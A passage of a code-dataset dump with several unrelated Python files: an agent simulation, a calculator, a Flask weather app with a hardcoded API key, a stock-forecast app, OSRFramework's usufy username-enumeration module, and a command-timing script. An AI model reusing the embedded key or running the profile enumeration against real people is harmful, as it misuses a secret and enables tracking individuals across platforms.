self.get_interaction(\"e1r2\")\n else:\n enacted = self.get_interaction(\"e1r1\")\n else:\n if (\n self.history[1] is not None\n and \"e2\" in self.history[1].label\n and (self.history[0] is None or \"e1\" in self.history[0].label)\n ):\n enacted = self.get_interaction(\"e2r2\")\n else:\n enacted = self.get_interaction(\"e2r1\")\n\n self.history = [self.history[1], enacted]\n return enacted\n\n\n@attr.s\nclass Existence:\n env = attr.ib()\n\n mood = None\n memory = (None, None)\n experiments = dict()\n interactions = dict()\n\n def __attrs_post_init__(self):\n i11 = self.env.get_interaction(\"e1r1\", -1)\n i12 = self.env.get_interaction(\"e1r2\", 3)\n i21 = self.env.get_interaction(\"e2r1\", -1)\n i22 = self.env.get_interaction(\"e2r2\", 3)\n self.get_abstract_experiment(i12)\n self.get_abstract_experiment(i22)\n\n def get_experiment(self, interaction: Interaction) -> Experiment:\n experiment = Experiment(interaction)\n return self.experiments.setdefault(experiment.label, experiment)\n\n def get_abstract_experiment(self, interaction: Interaction) -> Experiment:\n experiment = self.get_experiment(interaction)\n interaction.experiment = experiment\n return experiment\n\n def get_composite_interaction(\n self, anterior: Interaction, posterior: Interaction, weight: int\n ) -> Interaction:\n interaction = CompositeInteraction(anterior, posterior, weight)\n self.get_abstract_experiment(interaction)\n self.interactions[interaction.label] = interaction\n print(\n f\"learn: {interaction.label} | {interaction.valence} | {interaction.weight}\"\n )\n return interaction\n\n def get_active(\n self, experiences: typing.List[Interaction]\n ) -> typing.List[Interaction]:\n context = []\n if experiences[0] is not None:\n context.append(experiences[0])\n\n if experiences[1] is not None:\n context.append(experiences[1])\n\n if isinstance(experiences[1], CompositeInteraction):\n context.append(experiences[1].posterior)\n\n interactions = []\n for i in self.interactions.values():\n if isinstance(i, CompositeInteraction) and i.anterior in context:\n interactions.append(i)\n return interactions\n\n def anticipate(\n self, interactions: typing.List[Interaction]\n ) -> typing.List[Anticipation]:\n\n anticipations = [\n Anticipation(e, 0)\n for e in self.experiments.values()\n if isinstance(e.intended, PrimitiveInteraction)\n ]\n\n for interaction in interactions:\n if isinstance(interaction.posterior, CompositeInteraction):\n proclivity = interaction.weight * interaction.posterior.valence\n proposition = Anticipation(interaction.posterior.experiment, proclivity)\n append = True\n for anticipation in anticipations:\n if anticipation.experiment == proposition.experiment:\n anticipation.proclivity += proposition.proclivity\n append = False\n if append:\n anticipations.append(proposition)\n\n for anticipation in anticipations:\n for enacted in anticipation.experiment.enacted:\n for interaction in interactions:\n if enacted == interaction.posterior:\n proclivity = interaction.weight * enacted.valence\n anticipation.proclivity += proclivity\n\n return anticipations\n\n def select(self, anticipations: typing.List[Anticipation]) -> Interaction:\n anticipations = list(sorted(anticipations, reverse=True))\n\n for a in anticipations[:5]:\n print(f\"propose: {a.experiment.label} | {a.proclivity}\")\n return anticipations[0].experiment\n\n def find_composite(\n self, anterior: Interaction, posterior: Interaction\n ) -> Interaction:\n for i in self.interactions.values():\n if (\n isinstance(i, CompositeInteraction)\n and i.anterior == anterior\n and i.posterior == posterior\n ):\n i.weight += 1\n print(f\"reinforce: {i.label} | {i.valence} | {i.weight}\")\n return i\n return self.get_composite_interaction(anterior, posterior, 1)\n\n def enact_composite(self, interaction: Interaction) -> Interaction:\n if isinstance(interaction, PrimitiveInteraction):\n return self.env.perform(interaction)\n\n anterior = self.enact_composite(interaction.anterior)\n if anterior != interaction.anterior:\n return anterior\n\n posterior = self.enact_composite(interaction.posterior)\n return self.find_composite(anterior, posterior)\n\n def step(self) -> str:\n interactions = self.get_active(self.memory)\n anticipations = self.anticipate(interactions)\n experiment = self.select(anticipations)\n\n intended = experiment.intended\n print(f\"intended: {intended.label} | {intended.valence}\")\n\n enacted = self.enact_composite(intended)\n print(f\"enacted: {enacted.label} | {enacted.valence}\")\n\n if intended != enacted:\n experiment.enacted.append(enacted)\n\n if enacted.valence >= 0:\n self.mood = \"pleased\"\n else:\n self.mood = \"pained\"\n\n experience = None\n\n if self.memory[1] is not None:\n experience = self.find_composite(self.memory[1], enacted)\n\n if self.memory[0] is not None:\n self.find_composite(self.memory[0].anterior, experience)\n self.find_composite(self.memory[0], enacted)\n\n self.memory = (experience, enacted)\n\n return self.mood\n\n\nif __name__ == \"__main__\":\n env = Environment()\n existence = Existence(env)\n\n for i in range(26):\n trace = existence.step()\n print(f\"{i:02d}: {trace}\")\n print(15 * \"-\")\n","repo_name":"uatach/ideal-course-python","sub_path":"src/050-main.py","file_name":"050-main.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"74791349949","text":"def soma(a, b):\r\n return a + b\r\n\r\ndef sub(a, b):\r\n return a - b\r\n\r\ndef multi(a, b):\r\n return a * b\r\n\r\ndef divi(a, b):\r\n if b != 0:\r\n return a / b\r\n else:\r\n return \"Não é possível dividir por zero.\"\r\n\r\ndef calc():\r\n print(\"Selecione a operação:\")\r\n print(\"1. Adição\")\r\n print(\"2. Subtração\")\r\n print(\"3. Multiplicação\")\r\n print(\"4. Divisão\")\r\n\r\n escolha = input(\"Digite 1/2/3/4: \")\r\n\r\n num1 = float(input(\"Digite o primeiro número: \"))\r\n num2 = float(input(\"Digite o segundo número: \"))\r\n\r\n if escolha == '1':\r\n print(\"Resultado:\", soma(num1, num2))\r\n elif escolha == '2':\r\n print(\"Resultado:\", sub(num1, num2))\r\n elif escolha == '3':\r\n print(f\"Resultado:\", multi(num1, num2))\r\n elif escolha == '4':\r\n print(\"Resultado:\", divi(num1, num2))\r\n else:\r\n print(\"Escolha inválida.\")\r\n\r\n","repo_name":"AugustoFerreira0/Atividade-da-Fabrica-dia-02","sub_path":"atividades dia 02/calculadora_usando_funcao.py","file_name":"calculadora_usando_funcao.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"70460868352","text":"from flask import Flask, render_template\nfrom flask_bootstrap import Bootstrap5\nimport requests\nimport json\nimport os\nfrom form import Form\nimport math\n\nkey = 'f2956c73dc3189c78c159f01aa7d5ad1'\n\napp = Flask(__name__)\nbootstrap = Bootstrap5(app)\napp.config['SECRET_KEY'] = os.urandom(32)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n form = Form()\n city = 'london'\n weather = requests.get(f'https://api.openweathermap.org/data/2.5/weather?q={city}&units=metric&appid=' + key)\n contents = json.loads(weather.content)\n weather_display = {\n 'city': city.capitalize(),\n 'country': contents['sys']['country'],\n 'temperature': math.ceil(contents['main']['temp']),\n 'description': contents['weather'][0]['description'],\n 'icon': contents['weather'][0]['icon'],\n 'wind_speed': contents['wind']['speed'],\n 'wind_direction': contents['wind']['deg'],\n 'min_temp': math.ceil(contents['main']['temp_min']),\n 'max_temp': math.ceil(contents['main']['temp_max']),\n # 'temp_difference': math.ceil(contents['main']['temp_max'] - contents['main']['temp_min'])\n }\n return render_template('index.html', weather_display=weather_display, form=form)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"KeithGichovi/weatherapiapp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75191443070","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pandas_datareader as data\nfrom keras.models import load_model\nimport streamlit as st\nimport plotly.graph_objs as go\nimport yfinance as yf\nimport datetime\n\nstart = '2010-01-01'\nend ='2021-12-31'\n\nst.title(\"Stock Forecast\")\nst.markdown(\"The dashboard will help a researcher to get to know more about the stock graphs and prediction\")\n\nst.sidebar.title(\"Ticker Details\")\nst.sidebar.markdown(\"Enter Stock Ticker and Time Period you want to see data:\")\nuser_input = st.sidebar.text_input('Enter Stock Ticker','AAPL')\nstart_input = st.sidebar.date_input('Enter Start Date',datetime.date(2010, 1, 1))\nend_input = st.sidebar.date_input('Enter End Date', datetime.date(2022, 4, 22))\ndf = data.DataReader(user_input,'yahoo',start_input,end_input)\n\n\n\ntickerData = yf.Ticker(user_input)\ntickerDf = tickerData.history(period='1d',start=start_input, end = end_input)\n\nstring_logo='' % tickerData.info['logo_url']\nst.markdown(string_logo, unsafe_allow_html=True)\n\nstring_name=tickerData.info['longName']\nst.header('**%s**' % string_name)\n\nstring_summary=tickerData.info['longBusinessSummary']\nst.info(string_summary)\n\nst.header('**Ticker data**')\nst.write(tickerDf)\n\noption = st.sidebar.selectbox('Select Graph you want to see',('Data','Closing Vs Opening', '100MA', '200MA', 'Predicted'))\n\n\n#Data Representation\n#if option=='Data':\n# st.subheader('Data for given interval')\n# st.write(df.describe())\n\n#Graphs \nif option=='Closing Vs Opening':\n st.subheader('Closing Price Vs Time chart')\n fig = plt.figure()\n plt.plot(df.Open,'r',label='Opening Price')\n plt.plot(df.Close,'g',label='Closing Price')\n plt.legend()\n st.plotly_chart(fig,use_container_width=True)\n\nelif option=='100MA':\n st.subheader('Closing Price Vs Time chart with 100MA')\n ma100 = df.Close.rolling(100).mean()\n fig = plt.figure(figsize = (12,6))\n plt.plot(ma100)\n plt.plot(df.Close)\n st.pyplot(fig)\n\nelif option=='200MA':\n st.subheader('Closing Price Vs Time chart with 200MA')\n ma200 = df.Close.rolling(200).mean()\n ma100 = df.Close.rolling(100).mean()\n fig = plt.figure(figsize = (12,6))\n plt.plot(ma100)\n plt.plot(ma200)\n plt.plot(df.Close)\n st.pyplot(fig)\n\n#Splitting Data\ndata_training = pd.DataFrame(df['Close'][0:int(len(df)*0.70)])\ndata_testing = pd.DataFrame(df['Close'][int(len(df)*0.70):int(len(df))])\n\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler(feature_range=(0,1))\n\ndata_training_array = scaler.fit_transform(data_training)\n\n\n \n#load our LSTM model\nmodel= load_model('keras_model.h5')\n\npast_100_days = data_training.tail(100)\nfinal_df = past_100_days.append(data_testing, ignore_index=True)\ninput_data = scaler.fit_transform(final_df)\n\n\nx_test = []\ny_test = []\n\nfor i in range(100, input_data.shape[0]):\n x_test.append(input_data[i-100: i])\n y_test.append(input_data[i, 0])\n\n\nx_test,y_test = np.array(x_test), np.array(y_test)\n\ny_predicted = model.predict(x_test)\n\nscaler= scaler.scale_\n\nscale_factor = 1/scaler[0]\ny_predicted = y_predicted*scale_factor\ny_test = y_test*scale_factor\n\nif option=='Predicted':\n #forecasting Graph\n st.subheader('Actual VS Predicted Graph')\n fig2= plt.figure()\n plt.plot(y_test,'b',label='Original Price')\n plt.plot(y_predicted,'r',label='Predicted')\n plt.xlabel('no of days from start date')\n plt.ylabel('Price')\n plt.legend()\n st.plotly_chart(fig2,use_container_width=True)\n","repo_name":"hanuffer/lstm","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4806213786","text":"import argparse\nimport colorama\ncolorama.init(autoreset=True)\nimport datetime as dt\nimport json\n# global issues for multiprocessing\nfrom multiprocessing import Process, Queue, Pool\nimport os\n# Preparing to capture interruptions smoothly\nimport signal\nimport sys\nimport time\nimport traceback\nimport textwrap\n\n# configuration and utils\nimport osrframework\nimport osrframework.utils.platform_selection as platform_selection\nimport osrframework.utils.configuration as configuration\nimport osrframework.utils.banner as banner\nimport osrframework.utils.benchmark as benchmark\nimport osrframework.utils.browser as browser\nimport osrframework.utils.general as general\nfrom osrframework.utils.exceptions import *\n\n\ndef fuzzUsufy(fDomains = None, fFuzzStruct = None):\n \"\"\"\n Method to guess the usufy path against a list of domains or subdomains.\n\n Args:\n fDomains: A list to strings containing the domains and (optionally) a\n nick.\n fFuzzStruct: A list to strings containing the transforms to be\n performed.\n\n Returns:\n dict: A dictionary of the form of `{\"domain\": \"url\"}`.\n \"\"\"\n if fFuzzStruct == None:\n # Loading these structures by default\n fuzzingStructures = [\n \"http:///\",\n \"http:///~\",\n \"http:///?action=profile;user=\",\n \"http:///causes/author/\",\n \"http:///channel/\",\n \"http:///community/profile/\",\n \"http:///component/comprofiler/userprofiler/\",\n \"http:///details/@\",\n \"http:///foros/member.php?username=\",\n \"http:///forum/member/\",\n \"http:///forum/member.php?username=\",\n \"http:///forum/profile.php?mode=viewprofile&u=\",\n \"http:///home/\",\n \"http:///index.php?action=profile;user=\",\n \"http:///member_profile.php?u=\",\n \"http:///member.php?username=\",\n \"http:///members/?username=\",\n \"http:///members/\",\n \"http:///members/view/\",\n \"http:///mi-espacio/\",\n \"http:///u\",\n \"http:///u/\",\n \"http:///user-\",\n \"http:///user/\",\n \"http:///user/.html\",\n \"http:///users/\",\n \"http:///usr/\",\n \"http:///usuario/\",\n \"http:///usuarios/\",\n \"http:///en/users/\",\n \"http:///people/\",\n \"http:///profil/\",\n \"http:///profile/\",\n \"http:///profile/page/\",\n \"http:///rapidforum/index.php?action=profile;user=\",\n \"http:///social/usuarios/\",\n \"http://.\",\n \"http://./user/\"\n ]\n else:\n try:\n fuzzingStructures = fFuzzStruct.read().splitlines()\n except:\n print(\"Usufy could NOT open the following file: \" + fFuzzStruct)\n\n res = {}\n\n lines = fDomains.read().splitlines()\n\n # Going through all the lines\n for l in lines:\n domain = l.split()[0]\n print(\"Performing tests for\" + domain + \"...\")\n\n # selecting the number of nicks to be tested in this domain\n nick = l.split()[1]\n\n # possibleURLs found\n possibleURL = []\n\n for struct in fuzzingStructures:\n # initiating list\n urlToTry = struct.replace(\"\", domain)\n test = urlToTry.replace(\"\", nick.lower())\n print(\"Processing \"+ test + \"...\")\n i3Browser = browser.Browser()\n try:\n html = i3Browser.recoverURL(test)\n if nick in html:\n possibleURL.append(test)\n print(general.success(\"\\tPossible usufy found!!!\\n\"))\n except:\n print(\"The resource could not be downloaded.\")\n\n res[domain] = possibleURL\n\n print(json.dumps(res, indent = 2))\n return res\n\n\ndef pool_function(p, nick, rutaDescarga, avoidProcessing=True, avoidDownload=True, verbosity=1):\n \"\"\"\n Wrapper for being able to launch all the threads of getPageWrapper.\n\n We receive the parameters for getPageWrapper as a tuple.\n\n Args:\n pName: Platform where the information is stored. It is a string.\n nick: Nick to be searched.\n rutaDescarga: Local file where saving the obtained information.\n avoidProcessing: Boolean var that defines whether the profiles will NOT\n be processed (stored in this version).\n avoidDownload: Boolean var that defines whether the profiles will NOT be\n downloaded (stored in this version).\n verbosity: The verbosity level: 1, shows errors; 2, shows warnings.\n\n Returns:\n A dictionary with the following structure:\n {\n \t\"platform\": \"Platform\",\n \t\"status\": \"DONE\",\n \t\"data\": \"\"\n }\n Data is None or a serialized representation of the dictionary.\n \"\"\"\n try:\n res = p.get_info(\n query=nick,\n mode=\"usufy\"\n )\n return {\"platform\" : str(p), \"status\": \"Ok\", \"data\": res}\n\n except Exception as e:\n if (isinstance(e, OSRFrameworkError) and verbosity >= 1) and (isinstance(e, OSRFrameworkException) and verbosity >= 2):\n print(str(e))\n return {\"platform\" : str(p), \"status\": e, \"data\": e.generic}\n\n\ndef process_nick_list(nicks, platforms=None, rutaDescarga=\"./\", avoidProcessing=True, avoidDownload=True, nThreads=12, verbosity=1, logFolder=\"./logs\"):\n \"\"\"\n Process a list of nicks to check whether they exist.\n\n This method receives as a parameter a series of nicks and verifies whether\n those nicks have a profile associated in different social networks.\n\n Args:\n nicks: List of nicks to process.\n platforms: List of objects to be processed.\n rutaDescarga: Local file where saving the obtained information.\n avoidProcessing: A boolean var that defines whether the profiles will\n NOT be processed.\n avoidDownload: A boolean var that defines whether the profiles will NOT\n be downloaded.\n verbosity: The level of verbosity to be used.\n logFolder: The path to the log folder.\n\n Returns:\n A dictionary where the key is the nick and the value another dictionary\n where the keys are the social networks and the value is the\n corresponding URL.\n \"\"\"\n if platforms is None:\n platforms = platform_selection.get_all_platform_names(\"usufy\")\n\n # Defining the output results variable\n res = []\n # Processing the whole list of terms...\n for nick in nicks:\n # If the process is executed by the current app, we use the Processes. It is faster than pools.\n if nThreads <= 0 or nThreads > len(platforms):\n nThreads = len(platforms)\n\n # Using threads in a pool if we are not running the program in main\n # Example catched from: https://stackoverflow.com/questions/11312525/catch-ctrlc-sigint-and-exit-multiprocesses-gracefully-in-python\n try:\n original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)\n pool = Pool(nThreads)\n signal.signal(signal.SIGINT, original_sigint_handler)\n except ValueError:\n # To avoid: ValueError: signal only works in main thread\n pool = Pool(nThreads)\n\n pool_results = []\n try:\n def log_result(result):\n # This is called whenever foo_pool(i) returns a result.\n # result_list is modified only by the main process, not the pool workers.\n pool_results.append(result)\n\n for plat in platforms:\n # We need to create all the arguments that will be needed\n parameters = (plat, nick, rutaDescarga, avoidProcessing, avoidDownload, verbosity)\n pool.apply_async(pool_function, args=parameters, callback=log_result,)\n\n # Waiting for results to be finished\n while len(pool_results) < len(platforms):\n time.sleep(1)\n\n # Closing normal termination\n pool.close()\n except KeyboardInterrupt:\n print(general.warning(\"\\n[!] Process manually stopped by the user. Terminating workers.\\n\"))\n pool.terminate()\n print(general.warning(\"[!] The following platforms were not processed:\"))\n pending = \"\"\n for p in platforms:\n processed = False\n for processedPlatform in pool_results:\n if str(p) == processedPlatform[\"platform\"]:\n processed = True\n break\n if not processed:\n print(\"\\t- \" + str(p))\n pending += \" \" + str(p).lower()\n print(\"\\n\")\n print(general.warning(\"If you want to relaunch the app with these platforms you can always run the command with: \"))\n print(\"\\t usufy ... -p \" + general.emphasis(pending))\n print(\"\\n\")\n print(general.warning(\"If you prefer to avoid these platforms you can manually evade them for whatever reason with: \"))\n print(\"\\t usufy ... -x \" + general.emphasis(pending))\n print(\"\\n\")\n pool.join()\n\n # Collecting the results\n profiles = []\n errors = {}\n warnings = {}\n\n for info in pool_results:\n if info[\"status\"] == \"Ok\":\n array = json.loads(info[\"data\"])\n for r in array:\n if r != \"{}\":\n profiles.append(r)\n else:\n e = info[\"status\"]\n if isinstance(e, OSRFrameworkError):\n aux = errors.get(e.__class__.__name__, {})\n aux[\"info\"] = info[\"data\"]\n aux[\"counter\"] = aux.get(\"counter\", 0) + 1\n errors[e.__class__.__name__] = aux\n else:\n aux = warnings.get(e.__class__.__name__, {})\n aux[\"info\"] = info[\"data\"]\n aux[\"counter\"] = aux.get(\"counter\", 0) + 1\n warnings[e.__class__.__name__] = aux\n res += profiles\n\n if errors:\n now = dt.datetime.now()\n print(f\"\\n{now}\\tSome errors where found in the process:\")\n for key, value in errors.items():\n print(textwrap.fill(\"- {} (found: {}). Details:\".format(general.error(key), general.error(value[\"counter\"])), 90, initial_indent=\"\\t\"))\n print(textwrap.fill(\"\\t{}\".format(value[\"info\"]), 80, initial_indent=\"\\t\"))\n\n if warnings and verbosity >= 2:\n now = dt.datetime.now()\n print(\"\\n{}\\tSome warnings where found in the process:\".format(now))\n for key, value in warnings.items():\n print(textwrap.fill(\"- {} (found: {}). Details:\".format(general.warning(key), general.warning(value[\"counter\"])), 90, initial_indent=\"\\t\"))\n print(textwrap.fill(\"\\t{}\".format(value[\"info\"]), 80, initial_indent=\"\\t\"))\n\n return res\n\n\ndef get_parser():\n \"\"\"Defines the argument parser\n\n Returns:\n argparse.ArgumentParser.\n \"\"\"\n DEFAULT_VALUES = configuration.get_configuration_values_for(\"usufy\")\n # Capturing errors just in case the option is not found in the configuration\n try:\n excludeList = [DEFAULT_VALUES[\"exclude_platforms\"]]\n except:\n excludeList = []\n\n # Recovering all the possible options\n platOptions = platform_selection.get_all_platform_names(\"usufy\")\n\n parser = argparse.ArgumentParser(description= 'usufy - Piece of software that checks the existence of a profile for a given user in dozens of different platforms.', prog='usufy', epilog='Check the README.md file for further details on the usage of this program or follow us on Twitter in .', add_help=False, conflict_handler='resolve')\n parser._optionals.title = \"Input options (one required)\"\n\n # Adding the main options\n group_mainOptions = parser.add_mutually_exclusive_group(required=True)\n group_mainOptions.add_argument('--info', metavar='', choices=['list_platforms', 'list_tags'], action='store', help='select the action to be performed amongst the following: list_platforms (list the details of the selected platforms), list_tags (list the tags of the selected platforms). Afterwards, it exists.')\n group_mainOptions.add_argument('-b', '--benchmark', action='store_true', default=False, help='perform the benchmarking tasks.')\n group_mainOptions.add_argument('-f', '--fuzz', metavar='', action='store', type=argparse.FileType('r'), help='this option will try to find usufy-like URLs. The list of fuzzing platforms in the file should be (one per line): \\t')\n group_mainOptions.add_argument('-l', '--list', metavar='', action='store', type=argparse.FileType('r'), help='path to the file where the list of nicks to verify is stored (one per line).')\n group_mainOptions.add_argument('-n', '--nicks', metavar='', nargs='+', action='store', help = 'the list of nicks to process (at least one is required).')\n group_mainOptions.add_argument('--show_tags', action='store_true', default=False, help='it will show the platforms grouped by tags.')\n\n # Selecting the platforms where performing the search\n groupPlatforms = parser.add_argument_group('Platform selection arguments', 'Criteria for selecting the platforms where performing the search.')\n groupPlatforms.add_argument('-p', '--platforms', metavar='', choices=platOptions, nargs='+', required=False, default=DEFAULT_VALUES.get(\"platforms\", []), action='store', help='select the platforms where you want to perform the search amongst the following: ' + str(platOptions) + '. More than one option can be selected.')\n groupPlatforms.add_argument('-t', '--tags', metavar='', default = [], nargs='+', required=False, action='store', help='select the list of tags that fit the platforms in which you want to perform the search. More than one option can be selected.')\n groupPlatforms.add_argument('-x', '--exclude', metavar='', choices=platOptions, nargs='+', required=False, default=excludeList, action='store', help='select the platforms that you want to exclude from the processing.')\n\n # Configuring the processing options\n group_processing = parser.add_argument_group('Processing arguments', 'Configuring the way in which usufy will process the identified profiles.')\n group_processing.add_argument('--avoid_download', required=False, action='store_true', default=False, help='argument to force usufy NOT to store the downloadable version of the profiles.')\n group_processing.add_argument('--avoid_processing', required=False, action='store_true', default=False, help='argument to force usufy NOT to perform any processing task with the valid profiles.')\n group_processing.add_argument('--fuzz_config', metavar='', action='store', type=argparse.FileType('r'), help='path to the fuzzing config details. Wildcards such as the domains or the nicknames should come as: , .')\n group_processing.add_argument('--nonvalid', metavar='', required=False, default = '\\\\|<>=', action='store', help=\"string containing the characters considered as not valid for nicknames.\" )\n group_processing.add_argument('-e', '--extension', metavar='', nargs='+', choices=['csv', 'gml', 'json', 'ods', 'png', 'txt', 'xls', 'xlsx' ], required=False, default=DEFAULT_VALUES.get(\"extension\", [\"csv\"]), action='store', help='output extension for the summary files. Default: csv.')\n group_processing.add_argument('-L', '--logfolder', metavar='.\n\n\"\"\"\n print(general.info(saying_hello))\n\n if args.fuzz:\n res = fuzzUsufy(args.fuzz, args.fuzz_config)\n else:\n # Recovering the list of platforms to be launched\n list_platforms = platform_selection.get_platforms_by_name(platform_names=args.platforms, tags=args.tags, mode=\"usufy\", exclude_platform_names=args.exclude)\n\n if args.info:\n # Information actions...\n if args.info == 'list_platforms':\n info_platforms =\"Listing the platforms:\\n\"\n for p in list_platforms:\n info_platforms += \"\\t\\t\" + (str(p) + \": \").ljust(16, ' ') + str(p.tags)+\"\\n\"\n return info_platforms\n elif args.info == 'list_tags':\n tags = {}\n # Going through all the selected platforms to get their tags\n for p in list_platforms:\n for t in p.tags:\n if t not in tags.keys():\n tags[t] = 1\n else:\n tags[t] += 1\n info_tags = \"List of tags:\\n\"\n # Displaying the results in a sorted list\n for t in tags.keys():\n info_tags += \"\\t\\t\" + (t + \": \").ljust(16, ' ') + str(tags[t]) + \" time(s)\\n\"\n return info_tags\n else:\n pass\n\n # performing the test\n elif args.benchmark:\n platforms = platform_selection.get_all_platform_names(\"usufy\")\n res = benchmark.do_benchmark(platforms)\n str_times = \"\"\n for e in sorted(res.keys()):\n str_times += str(e) + \"\\t\" + str(res[e]) + \"\\n\"\n return str_times\n\n # showing the tags of the usufy platforms\n elif args.show_tags:\n tags = platform_selection.get_all_platform_names_by_tag(\"usufy\")\n print(general.info(\"This is the list of platforms grouped by tag.\\n\"))\n print(json.dumps(tags, indent=2, sort_keys=True))\n print(general.info(\"[Tip] Remember that you can always launch the platform using the -t option followed by any of the aforementioned.\\n\"))\n\n # Executing the corresponding process...\n else:\n # Showing the execution time...\n start_time = dt.datetime.now()\n print(f\"{start_time}\\tStarting search in {general.emphasis(str(len(list_platforms)))} platform(s)... Relax!\\n\")\n print(general.emphasis(\"\\tPress to stop...\\n\"))\n\n # Defining the list of users to monitor\n nicks = []\n if args.nicks:\n for n in args.nicks:\n nicks.append(n)\n else:\n # Reading the nick files\n try:\n nicks = args.list.read().splitlines()\n except:\n print(general.error(\"ERROR: there has been an error when opening the file that stores the nicks.\\tPlease, check the existence of this file.\"))\n\n # Definning the results\n res = []\n\n if args.output_folder != None:\n # if Verifying an output folder was selected\n if not os.path.exists(args.output_folder):\n os.makedirs(args.output_folder)\n # Launching the process...\n res = process_nick_list(nicks, list_platforms, args.output_folder, avoidProcessing = args.avoid_processing, avoidDownload = args.avoid_download, nThreads=args.threads, verbosity= args.verbose, logFolder=args.logfolder)\n\n else:\n try:\n res = process_nick_list(nicks, list_platforms, nThreads=args.threads, verbosity= args.verbose, logFolder=args.logfolder)\n except Exception as e:\n print(general.error(\"Exception grabbed when processing the nicks: \" + str(e)))\n print(general.error(traceback.print_stack()))\n\n # We are going to iterate over the results...\n str_results = \"\\t\"\n\n # Structure returned\n \"\"\"\n [\n {\n \"attributes\": [\n {\n \"attributes\": [],\n \"type\": \"com.i3visio.URI\",\n \"value\": \"http://twitter.com/i3visio\"\n },\n {\n \"attributes\": [],\n \"type\": \"com.i3visio.Alias\",\n \"value\": \"i3visio\"\n },\n {\n \"attributes\": [],\n \"type\": \"com.i3visio.Platform\",\n \"value\": \"Twitter\"\n }\n ],\n \"type\": \"com.i3visio.Profile\",\n \"value\": \"Twitter - i3visio\"\n }\n ,\n ...\n ]\n \"\"\"\n for r in res:\n # The format of the results (attributes) for a given nick is a list as follows:\n\n for att in r[\"attributes\"]:\n # iterating through the attributes\n platform = \"\"\n uri = \"\"\n for details in att[\"attributes\"]:\n if details[\"type\"] == \"com.i3visio.Platform\":\n platform = details[\"value\"]\n if details[\"type\"] == \"com.i3visio.URI\":\n uri = details[\"value\"]\n try:\n str_results += (str(platform) + \":\").ljust(16, ' ')+ \" \"+ str(uri)+\"\\n\\t\\t\"\n except:\n pass\n\n # Generating summary files for each ...\n if args.extension:\n # Verifying if the outputPath exists\n if not os.path.exists (args.output_folder):\n os.makedirs(args.output_folder)\n\n # Grabbing the results\n file_header = os.path.join(args.output_folder, args.file_header)\n\n # Iterating through the given extensions to print its values\n for ext in args.extension:\n # Generating output files\n general.export_usufy(res, ext, file_header)\n\n now = dt.datetime.now()\n print(f\"\\n{now}\\tResults obtained ({general.emphasis(len(res))}):\\n\")\n print(general.success(general.osrf_to_text_export(res)))\n\n if args.web_browser:\n general.open_results_in_browser(res)\n\n now = dt.datetime.now()\n print(\"\\n\" + str(now) + \"\\tYou can find all the information here:\")\n for ext in args.extension:\n # Showing the output files\n print(\"\\t\" + general.emphasis(file_header + \".\" + ext))\n\n # Showing the execution time...\n end_time = dt.datetime.now()\n print(f\"\\n{end_time}\\tFinishing execution...\\n\")\n print(\"Total time consumed:\\t\" + general.emphasis(str(end_time-start_time)))\n print(\"Average seconds/query:\\t\" + general.emphasis(str((end_time-start_time).total_seconds()/len(list_platforms))) +\" seconds\\n\")\n\n # Urging users to place an issue on Github...\n print(banner.footer)\n\n if params:\n return res\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"i3visio/osrframework","sub_path":"osrframework/usufy.py","file_name":"usufy.py","file_ext":"py","file_size_in_byte":26887,"program_lang":"python","lang":"en","doc_type":"code","stars":837,"dataset":"github-code","pt":"60"} +{"seq_id":"40604217302","text":"#Internship Assignment 2\r\n#Monument Labs\r\n\r\n#Author: Alexander Moreno\r\n#Date: 5/26/2018\r\n#Task 1\r\n\r\n#UNIX Operating Systems are assumed\r\n\r\n\r\n#imports\r\nimport subprocess\r\nimport time\r\n\r\n\r\n\r\n\r\n#display data from runCommands\r\ndef displayReport(data):\r\n print(\"\\nTime Statistics:\\n\")\r\n print(\"\\t Minimum runtime: command \\'%s\\' at %0.4f seconds.\\n\" % (data[0][0],data[0][1]) )\r\n print(\"\\t Maximum runtime: command \\'%s\\' at %0.4f seconds.\\n\" % (data[1][0],data[1][1]))\r\n print(\"\\t Average runtime: %0.4f seconds.\\n\" % data[2])\r\n print(\"\\t Total elapsed time: %0.4f seconds.\\n\" % data[3])\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\ndef runCommands(cmds):\r\n #Variables\r\n #cmdstimes=[]\r\n minTime= None\r\n minIndex = 0\r\n maxTime=None\r\n maxIndex = 0\r\n avgTime=0\r\n totalTime=0\r\n for cmd in cmds:\r\n #set up process\r\n start = time.time()\r\n p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)\r\n\r\n #Wait for processes to finish\r\n while p.poll() is None:\r\n time.sleep(0)\r\n end = time.time()\r\n\r\n \r\n if minTime == None and maxTime == None:\r\n minTime = end-start\r\n maxTime = end-start\r\n minIndex = cmds.index(cmd)\r\n maxIndex = cmds.index(cmd)\r\n \r\n if (end-start) > maxTime:\r\n maxTime = end-start\r\n maxIndex = cmds.index(cmd)\r\n elif (end-start) < minTime:\r\n minTime = end-start\r\n minIndex = cmds.index(cmd)\r\n\r\n #add to total elapsed time\r\n totalTime += end-start\r\n #cmdstimes.append(end-start)\r\n #print(cmdstimes)\r\n #Process data\r\n avgTime = totalTime / len(cmds)\r\n\r\n return ([cmds[minIndex],minTime],[cmds[maxIndex],maxTime],avgTime,totalTime)\r\n \r\n\r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n #commands\r\n commands = [\r\n 'sleep 3',\r\n 'ls -l /',\r\n 'find /',\r\n 'sleep 4',\r\n 'find /usr',\r\n 'date',\r\n 'sleep 5',\r\n 